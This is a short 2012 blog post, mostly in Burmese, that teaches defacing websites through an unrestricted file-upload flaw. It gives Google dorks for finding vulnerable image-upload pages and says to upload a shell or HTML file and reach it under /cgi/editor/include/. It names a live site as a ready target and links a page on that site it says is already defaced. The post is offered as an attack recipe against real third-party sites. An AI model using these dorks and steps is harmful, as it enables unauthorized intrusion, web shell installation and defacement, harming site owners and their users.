Subscribe For Free Updates!

We'll not spam mate! We promise.

Saturday, May 19, 2012

Deface,Shell and Image Upload Vulnerability

Google Dorks:inurl:"default_image.asp"
                   inurl:"default_imagen.asp"
                  inurl:"/box_image.htm"

သင္တုိ ့ ၾကိုက္တဲ့လင့္တစ္ခုကို သြားလုိက္ပါ..ျပီးရင္
ကုိသင္ခ်င္တဲ့ဖုိင္ တင္ပါ.. shell , html , image ,etc...
ျပီးသြားရင္ တင္ျပီးတာနဲ ့လင့္ေနာက္မွာ  /cgi/editor/include/yourfile

ဥပမာအေနနဲ ့စမ္းဖုိ ့ ေအာက္ကလင့္ကိုသြားလုိက္ပါ...
မလုပ္ရေသးတဲ့လင့္ေလးပါ
http://www.bid1.co.kr/cgi/editor/include/box_image.htm
Deface လုပ္ျပီးသားလင့္ပါ..
http://www.bid1.co.kr/cgi/upload_img/mc.html

Please Give Us Your 1 Minute In Sharing This Post!
SOCIALIZE IT →
FOLLOW US →
SHARE IT →
Powered By: BloggerYard.Com

0 comments:

Post a Comment